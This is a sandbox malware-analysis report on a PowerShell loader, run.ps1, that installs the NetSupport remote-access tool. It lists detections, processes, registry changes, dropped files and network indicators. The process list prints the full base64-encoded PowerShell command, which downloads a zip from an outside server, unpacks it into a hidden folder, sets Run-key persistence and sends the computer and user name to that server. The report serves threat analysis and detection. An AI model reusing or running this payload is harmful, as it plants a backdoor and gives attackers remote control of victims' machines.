File name:

run.ps1

Full analysis: https://app.any.run/tasks/4800fda7-b580-434f-abbb-8925d2c30075
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 06, 2025, 21:37:26
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
netsupport
unwanted
remote
tool
reflection
loader
arch-exec
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (455), with no line terminators
MD5:

34461789A1F174ECF1CBFAFB6C862D49

SHA1:

C3F90E8A3ABC878E94E8A563217ADC2E038073B3

SHA256:

2448A60F70FB81CE1EDF022D764A48C58C74ACEFD992CEE9E70EC5C6C5B51896

SSDEEP:

12:MU2ICFukuK1yIgP1OWu0tHz98RB2DOexWb2RKJFtH7LctR:M5IGu9IgtOWv6n2DOIRwv2R

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Bypass)

      • powershell.exe (PID: 4392)

    • Bypass execution policy to execute commands

      • powershell.exe (PID: 4392)
      • powershell.exe (PID: 3560)

    • Executing a file with an untrusted certificate

      • client32.exe (PID: 3552)
      • client32.exe (PID: 3032)

    • NETSUPPORT mutex has been found

      • client32.exe (PID: 3552)

    • NETSUPPORT has been detected (SURICATA)

      • client32.exe (PID: 3552)

    • Connects to the CnC server

      • client32.exe (PID: 3552)

    • NETSUPPORT has been detected (YARA)

      • client32.exe (PID: 3552)

  • SUSPICIOUS

    • Application launched itself

      • powershell.exe (PID: 4392)

    • Gets or sets the security protocol (POWERSHELL)

      • powershell.exe (PID: 4392)
      • powershell.exe (PID: 3560)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4392)

    • BASE64 encoded PowerShell command has been detected

      • powershell.exe (PID: 4392)

    • The process bypasses the loading of PowerShell profile settings

      • powershell.exe (PID: 4392)

    • Base64-obfuscated command line is found

      • powershell.exe (PID: 4392)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3560)

    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 4392)

    • Writes data to a memory stream (POWERSHELL)

      • powershell.exe (PID: 3560)

    • Drop NetSupport executable file

      • powershell.exe (PID: 3560)

    • The process drops C-runtime libraries

      • powershell.exe (PID: 3560)

    • Process drops legitimate windows executable

      • powershell.exe (PID: 3560)

    • Contacting a server suspected of hosting an CnC

      • client32.exe (PID: 3552)

    • Reads security settings of Internet Explorer

      • client32.exe (PID: 3552)

    • Potential Corporate Privacy Violation

      • client32.exe (PID: 3552)

    • Connects to the server without a host name

      • client32.exe (PID: 3552)

  • INFO

    • Checks proxy server information

      • powershell.exe (PID: 4392)
      • client32.exe (PID: 3552)

    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 3560)

    • Gets or sets the time when the file was last written to (POWERSHELL)

      • powershell.exe (PID: 3560)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 3560)

    • The process uses the downloaded file

      • powershell.exe (PID: 3560)

    • The executable file from the user directory is run by the Powershell process

      • client32.exe (PID: 3552)

    • Reads the computer name

      • client32.exe (PID: 3552)

    • Checks supported languages

      • client32.exe (PID: 3552)
      • remcmdstub.exe (PID: 5032)

    • The sample compiled with english language support

      • powershell.exe (PID: 3560)

    • Manual execution by a user

      • OpenWith.exe (PID: 1356)
      • OpenWith.exe (PID: 5628)
      • notepad.exe (PID: 3848)
      • notepad.exe (PID: 1228)
      • client32.exe (PID: 3032)
      • remcmdstub.exe (PID: 5032)
      • OpenWith.exe (PID: 5092)
      • OpenWith.exe (PID: 3612)

    • Reads Microsoft Office registry keys

      • OpenWith.exe (PID: 5628)
      • OpenWith.exe (PID: 5092)

    • Reads security settings of Internet Explorer

      • notepad.exe (PID: 3848)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
131
Monitored processes
13
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start powershell.exe conhost.exe no specs powershell.exe #NETSUPPORT client32.exe client32.exe no specs remcmdstub.exe no specs conhost.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs openwith.exe no specs notepad.exe no specs notepad.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
132\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1228"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\nskbfltr.infC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
1356"C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\HTCTL32.DLLC:\Windows\System32\OpenWith.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3032"C:\Users\admin\Desktop\client32.exe" C:\Users\admin\Desktop\client32.exeexplorer.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Exit code:
3221225781
Version:
V11.10
Modules
Images
c:\users\admin\desktop\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
3172\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exeremcmdstub.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
3552"C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe" C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe
powershell.exe
User:
admin
Company:
NetSupport Ltd
Integrity Level:
MEDIUM
Description:
NetSupport Client Application
Version:
V11.10
Modules
Images
c:\users\admin\appdata\roaming\edgdecache\client32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\users\admin\appdata\roaming\edgdecache\pcicl32.dll
3560"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -nOPROFIle -EP byPASs -windowstYL h -encODEDCom JABjAEUAaABIADgASQBwAGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwBjAGsAdABlAG0AcABsAGEAdABlAHMALgBuAGUAdAAvAGEAbABsAC8AegBhAGwAbAAvAGYAYQBhAC4AegBpAHAAJwA7ACAAYwBIAGQAaQByACAAJABFAG4AdgA6AEEAcABQAEQAQQB0AEEAOwAgAFsAbgBFAHQALgBzAEUAcgB2AGkAQwBlAHAATwBpAE4AdABNAGEATgBhAEcARQBSAF0AOgA6AHMARQBDAHUAcgBpAHQAeQBwAHIAbwBUAE8AYwBvAGwAIAA9ACAAWwBuAEUAdAAuAHMAZQBDAHUAUgBJAHQAWQBwAFIATwBUAG8AYwBvAEwAdABZAHAARQBdADoAOgBUAGwAcwAxADIAOwAgACQAaQBBAFYAVABZAEgAMQBoAD0AJwBFAGQAZwBkAGUAQwBhAGMAaABlACcAOwAgACQAUgBOAEkAQQBXAHoAPQBHAGUAVAAtAGMATwBNAE0AQQBuAGQAIABzAHQAYQByAFQALQBCAGkAdABzAFQAUgBBAG4AcwBmAEUAcgAgAC0ARQBSAHIATwByAGEAQwB0AEkAbwBOACAAUwBJAEwARQBuAFQAbAB5AEMATwBuAFQASQBOAHUARQA7ACAAJABaAE4ASgA1ADIAdQA2AD0AJABlAG4AdgA6AEEAUABwAGQAQQBUAGEALAAgACQAaQBBAFYAVABZAEgAMQBoACAALQBKAG8AaQBOACAAJwBcACcAOwAgAFQAcgB5ACAAewAgAE4ARQBXAC0ASQBUAGUAbQAgAC0AUABhAFQASAAgACQARQBOAHYAOgBhAHAAUABkAGEAVABBACAALQBuAEEAbQBlACAAJABpAEEAVgBUAFkASAAxAGgAIAAtAGkAdABlAE0AdABZAHAAZQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAAYQBkAGQALQBUAHkAUABFACAALQBBAFMAcwBFAE0AQgBsAHkATgBhAG0ARQAgAFMAeQBzAFQAZQBtAC4AaQBvAC4AYwBvAG0AcABSAGUAUwBTAGkAbwBuACwAIABzAFkAUwBUAEUAbQAuAGkAbwAuAGMATwBNAHAAUgBlAFMAcwBpAE8AbgAuAEYASQBMAGUAUwB5AHMAdABFAG0AIAAtAEUAcgBSAG8AUgBhAGMAVABJAE8AbgAgAFMASQBsAEUATgB0AGwAeQBDAE8AbgBUAEkAbgB1AEUAOwAgACQAWAB5AGsAcABnAFgAawA9ACgAVwBHAEUAdAAgAC0AdQBSAGkAIAAkAGMARQBoAEgAOABJAHAAYwAgAC0AVQBTAGUAYgBBAHMAaQBDAFAAYQByAHMAaQBOAGcAKQAuAEMATwBuAHQAZQBuAHQAOwAgACQAQgBPADkAYwAwAGoAQgA9AE4AZQB3AC0ATwBiAGoARQBjAFQAIABzAFkAUwBUAGUATQAuAGkATwAuAG0ARQBNAG8AUgBZAFMAdAByAGUAQQBNADsAIAAkAEIATwA5AGMAMABqAEIALgBXAFIASQB0AEUAKAAkAFgAeQBrAHAAZwBYAGsALAAgADAALAAgACQAWAB5AGsAcABnAFgAawAuAEwARQBOAGcAVABIACkAOwAgACQAQgBPADkAYwAwAGoAQgAuAHMARQBlAEsAKAAwACwAIABbAFMAeQBzAHQARQBNAC4ASQBvAC4AcwBFAEUAawBPAFIASQBnAGkAbgBdADoAOgBiAGUARwBpAE4AKQAgAHwAIABPAHUAdAAtAG4AdQBsAGwAOwAgACQAMwBrAGkAagBEAEMAdgBYAD0AbgBlAFcALQBvAEIASgBFAGMAdAAgAFMAWQBTAHQARQBNAC4ASQBPAC4AQwBvAE0AcAByAGUAcwBzAEkAbwBuAC4AWgBpAHAAQQByAGMAaABJAHYAZQAoACQAQgBPADkAYwAwAGoAQgAsACAAWwBzAFkAUwB0AEUATQAuAEkATwAuAEMATwBtAHAAcgBFAHMAcwBJAG8ATgAuAFoAaQBQAGEAcgBDAGgASQB2AGUAbQBPAGQAZQBdADoAOgByAGUAQQBEACkAOwAgAEYAbwBSAEUAYQBDAEgAKAAkAFoAaAAyAHUAYQBYACAAaQBuACAAJAAzAGsAaQBqAEQAQwB2AFgALgBlAG4AdAByAGkARQBTACkAIAB7ACAAJAAxAFQAdgA4ADcAagBVAD0AagBvAEkAbgAtAFAAYQB0AEgAIAAtAFAAYQBUAGgAIAAkAFoATgBKADUAMgB1ADYAIAAtAGMAaABpAEwAZABwAEEAVABIACAAJABaAGgAMgB1AGEAWAAuAG4AYQBtAGUAOwAgACQAdwBDAGcASgBjAE8APQAkAFoAaAAyAHUAYQBYAC4ATwBwAEUAbgAoACkAOwAgACQAMgBBAHgAaQBKAHAAMgBZAD0AWwBzAFkAcwBUAGUAbQAuAGkAbwAuAGYAaQBMAEUAXQA6ADoAYwBSAGUAYQBUAEUAKAAkADEAVAB2ADgANwBqAFUAKQA7ACAAJAB3AEMAZwBKAGMATwAuAEMATwBwAFkAdABPACgAJAAyAEEAeABpAEoAcAAyAFkAKQA7ACAAJAAyAEEAeABpAEoAcAAyAFkALgBjAEwAbwBzAGUAKAApADsAIAAkAHcAQwBnAEoAYwBPAC4AYwBMAE8AUwBFACgAKQA7AH0AIAAkADMAawBpAGoARABDAHYAWAAuAGQASQBTAHAAbwBTAGUAKAApADsAIAAkAEIATwA5AGMAMABqAEIALgBkAEkAUwBwAG8AcwBlACgAKQA7ACAAfQAgAGMAYQB0AGMAaAAgAHsAJABIAHkAcQBrAHAAMQA9ACcAaAB0AHQAcABzADoALwAvAHMAdABvAGMAawB0AGUAbQBwAGwAYQB0AGUAcwAuAG4AZQB0AC8AYQBsAGwALwBmAGEAbABsAC8AJwA7ACAAJABKAHIAVwBkADEAcgA9AEAAKAAnAFAAQwBJAEMASABFAEsALgBEAEwATAAnACwAIAAnAHAAYwBpAGMAYQBwAGkALgBkAGwAbAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAbgBzAGsAYgBmAGwAdAByAC4AaQBuAGYAJwAsACAAJwBjAGwAaQBlAG4AdAAzADIALgBpAG4AaQAnACwAIAAnAHIAZQBtAGMAbQBkAHMAdAB1AGIALgBlAHgAZQAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBMADMAMgAuAEQATABMACcALAAgACcASABUAEMAVABMADMAMgAuAEQATABMACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBBAHUAZABpAG8AQwBhAHAAdAB1AHIAZQAuAGQAbABsACcALAAgACcAVABDAEMAVABMADMAMgAuAEQATABMACcALAAgACcATgBTAE0ALgBMAEkAQwAnACkAOwAgAE4ARQBXAC0ASQBUAGUAbQAgAC0AUABhAHQAaAAgACQARQBuAHYAOgBBAFAAUABEAGEAVABBACAALQBOAGEAbQBlACAAJABpAEEAVgBUAFkASAAxAGgAIAAtAEkAdABlAG0AVABZAHAAZQAgACcAZABpAHIAZQBjAHQAbwByAHkAJwA7ACAASQBGACAAKAAkAFIATgBJAEEAVwB6ACkAIAB7ACAAJABKAHIAVwBkADEAcgAgAHwAIABmAG8AcgBFAEEAYwBIACAAewAgACQATQBqAEQATwBtAE0AUAA9ACQASAB5AHEAawBwADEAKwAkAF8AOwAgACQAWABmAHYAZAByAFAANwBPAD0AJABaAE4ASgA1ADIAdQA2ACsAJwBcACcAKwAkAF8AOwAgAFMAdABhAHIAdAAtAGIAaQBUAFMAVAByAGEAbgBzAEYARQBSACAALQBzAE8AVQByAEMAZQAgACQATQBqAEQATwBtAE0AUAAgAC0AZABFAHMAVABJAG4AQQB0AGkATwBOACAAJABYAGYAdgBkAHIAUAA3AE8AOwAgAH0AOwB9ACAAZQBsAHMAZQAgAHsAIAAkAEoAcgBXAGQAMQByACAAfAAgAEYATwBSAEUAQQBDAGgALQBPAGIAagBFAGMAVAAgAHsAIAAkAE0AagBEAE8AbQBNAFAAPQAkAEgAeQBxAGsAcAAxACsAJABfADsAIAAkAFgAZgB2AGQAcgBQADcATwA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABaAE4ASgA1ADIAdQA2ACwAIAAkAF8AOwAgACQAQgBXAEUASABaADgAPQAiAEIAaQB0AHMAYQBkAE0ASQBOAC4ARQBYAEUAIAAvAFQAcgBBAG4AUwBGAEUAUgAgAGkAdgBZADYAdgBXAGwAIAAvAEQAbwB3AE4AbABvAGEAZAAgAC8AUABSAGkAbwBSAGkAVAB5ACAATgBPAFIAbQBBAGwAIAAkAE0AagBEAE8AbQBNAFAAIAAkAFgAZgB2AGQAcgBQADcATwAiADsAIABJAG4AVgBvAGsARQAtAGUAeABQAHIARQBzAHMASQBvAE4AIAAtAGMAbwBtAE0AYQBOAEQAIAAkAEIAVwBFAEgAWgA4ADsAfQA7ACAAfQA7ACAAfQA7ACAAJABtAHQARQA3AGsASQBNAD0ARwBpACAAJABaAE4ASgA1ADIAdQA2ACAALQBmAG8AUgBjAEUAOwAgACQAbQB0AEUANwBrAEkATQAuAEEAdAB0AFIAaQBiAFUAdABlAFMAPQAnAEgAaQBkAGQAZQBuACcAOwAgACQAYQBWADIAeQBNAEUAPQAkAFoATgBKADUAMgB1ADYAKwAnAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwA7ACAAQwBkACAAJABaAE4ASgA1ADIAdQA2ADsAIABzAFQAYQByAFQAIABDAEwASQBFAG4AdAAzADIALgBlAFgAZQA7ACAATgBFAFcALQBJAHQARQBNAHAAUgBvAFAARQByAFQAWQAgAC0AUABhAFQAaAAgACcAaABrAGMAVQA6AFwAUwBPAEYAdAB3AGEAUgBlAFwAbQBpAEMAUgBvAFMATwBmAFQAXAB3AGkATgBkAG8AVwBzAFwAQwBVAFIAUgBFAG4AdAB2AEUAcgBTAEkATwBuAFwAUgB1AE4AJwAgAC0ATgBhAG0AZQAgACQAaQBBAFYAVABZAEgAMQBoACAALQB2AGEAbAB1AEUAIAAkAGEAVgAyAHkATQBFACAALQBwAFIATwBwAGUAUgBUAHkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAJABCAHYANAB6AFQAPQBnAHAAUwAgAGMAbABpAGUAbgB0ADMAMgAgAC0ARQBSAHIAbwBSAEEAYwBUAEkATwBuACAAcwBJAGwAZQBOAHQAbAB5AGMATwBuAHQAaQBuAHUAZQA7ACAAJABSAGMAQgBJAG0APQAiAGgAdAB0AHAAcwA6AC8ALwBzAHQAbwBjAGsAdABlAG0AcABsAGEAdABlAHMALgBuAGUAdAAvAGEAbABsAC8AYQBsAGwAcwB0AGEAdAAvAHAAYQB0AGMAaABlAGQALgBwAGgAcAA/AGMAcABuAG0AZQA9ACQARQBOAHYAOgBjAE8ATQBQAHUAVABlAFIATgBhAG0AZQAmAHUAcwBuAG0AZQA9ACQARQBOAFYAOgBVAFMARQByAG4AYQBtAEUAJgBwAGEAcgBhAG0APQAiADsAIABJAGYAIAAoACQAQgB2ADQAegBUAC4ASQBkACkAIAB7ACAAJAA5AG8AcgBEADUAPQAkAFIAYwBCAEkAbQArACcAaQA4AFcAQwAnADsAIABJAHcAUgAgACQAOQBvAHIARAA1ACAALQBVAHMARQBCAEEAcwBpAEMAcABBAFIAcwBJAE4ARwA7AH0AIABFAEwAcwBlACAAewAgACQAOQBvAHIARAA1AD0AJABSAGMAQgBJAG0AKwAnAHMASwBCADYAaQAnADsAIABJAHcAUgAgACQAOQBvAHIARAA1ACAALQBVAFMAZQBCAEEAcwBpAEMAcABhAFIAUwBpAE4AZwA7AH0AOwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
3612"C:\WINDOWS\System32\OpenWith.exe" C:\Users\admin\Desktop\NSM.LICC:\Windows\System32\OpenWith.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Pick an app
Exit code:
2147943623
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\openwith.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
3848"C:\WINDOWS\system32\NOTEPAD.EXE" C:\Users\admin\Desktop\client32.iniC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\user32.dll
4392"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass C:\Users\admin\Desktop\run.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 952
Read events
14 945
Write events
7
Delete events
0

Modification events

(PID) Process:(3560) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:EdgdeCache
Value:
C:\Users\admin\AppData\Roaming\EdgdeCache\client32.exe
(PID) Process:(3552) client32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(3552) client32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(3552) client32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(5092) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation:writeName:dllfile
Value:
(PID) Process:(1356) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation:writeName:dllfile
Value:
(PID) Process:(5628) OpenWith.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.dll\OpenWithProgids
Operation:writeName:dllfile
Value:
Executable files
9
Suspicious files
5
Text files
10
Unknown types
0

Dropped files

PID
Process
Filename
Type
4392powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wgxahbml.4gy.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msbinary
MD5:261D16F743E7B01743903A3FE1290590
SHA256:7DDD85EE1C73B61B4D592F04DFABB0A9CF91741337F605E96D76404A295DBC8A
3560powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qci43txk.uc1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3560powershell.exeC:\Users\admin\AppData\Roaming\EdgdeCache\PCICL32.DLLexecutable
MD5:D16FFA06A35601A73B73836BF905ED19
SHA256:80CC439A0633ADD1DD964BB6BB40CCDCFEC3AE28DA39FD9416642AB0605D40AB
3560powershell.exeC:\Users\admin\AppData\Roaming\EdgdeCache\TCCTL32.DLLexecutable
MD5:60AEA67E2659E1961369E04185C61ADF
SHA256:8FD7F3EB1882755A8C5BA998409B20B240AED8EC025629B1679EA288EC2AE8AA
3560powershell.exeC:\Users\admin\AppData\Roaming\EdgdeCache\PCICHEK.DLLexecutable
MD5:A0B9388C5F18E27266A31F8C5765B263
SHA256:313117E723DDA6EA3911FAACD23F4405003FB651C73DE8DEFF10B9EB5B4A058A
3560powershell.exeC:\Users\admin\AppData\Roaming\EdgdeCache\client32.exeexecutable
MD5:290C26B1579FD3E48D60181A2D22A287
SHA256:973836529B57815903444DD5D4B764E8730986B1BD87179552F249062EE26128
3560powershell.exeC:\Users\admin\AppData\Roaming\EdgdeCache\remcmdstub.exeexecutable
MD5:A0692E92F906639CA1816AF18F89B681
SHA256:397FBA98EC417B1381040FF1AB40ECCC41E40ECA1BF2EE9B809814E5C2846E1A
4392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7KUTKBRQEPGR0B8JX8N1.tempbinary
MD5:261D16F743E7B01743903A3FE1290590
SHA256:7DDD85EE1C73B61B4D592F04DFABB0A9CF91741337F605E96D76404A295DBC8A
4392powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF136238.TMPbinary
MD5:D040F64E9E7A2BB91ABCA5613424598E
SHA256:D04E0A6940609BD6F3B561B0F6027F5CA4E8C5CF0FB0D0874B380A0374A8D670
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
10
TCP/UDP connections
24
DNS requests
14
Threats
7

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5448
svchost.exe
GET
200
2.18.79.132:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
5448
svchost.exe
GET
200
104.121.145.122:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
2.18.79.132:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
4712
MoUsoCoreWorker.exe
GET
200
104.121.145.122:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
192.236.177.39:443
https://stocktemplates.net/all/allstat/patched.php?cpnme=DESKTOP-JGLLJLD&usnme=admin&param=i8WC
unknown
3552
client32.exe
POST
502
79.132.128.77:443
http://79.132.128.77/fakeurl.htm
unknown
malicious
3552
client32.exe
GET
200
104.26.1.231:80
http://geo.netsupportsoftware.com/location/loca.asp
unknown
malicious
3552
client32.exe
POST
502
79.132.128.77:443
http://79.132.128.77/fakeurl.htm
unknown
malicious
GET
200
192.236.177.39:443
https://stocktemplates.net/all/patch_info.php?compName=DESKTOP-JGLLJLD
unknown
text
6.14 Kb
GET
200
192.236.177.39:443
https://stocktemplates.net/all/zall/faa.zip
unknown
compressed
2.14 Mb
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
192.168.100.255:137
unknown
4712
MoUsoCoreWorker.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5448
svchost.exe
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
88.221.92.173:443
www.bing.com
Akamai International B.V.
NL
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4
System
192.168.100.255:138
unknown
4712
MoUsoCoreWorker.exe
2.18.79.132:80
crl.microsoft.com
Akamai International B.V.
AT
whitelisted
5448
svchost.exe
2.18.79.132:80
crl.microsoft.com
Akamai International B.V.
AT
whitelisted
4712
MoUsoCoreWorker.exe
104.121.145.122:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5448
svchost.exe
104.121.145.122:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
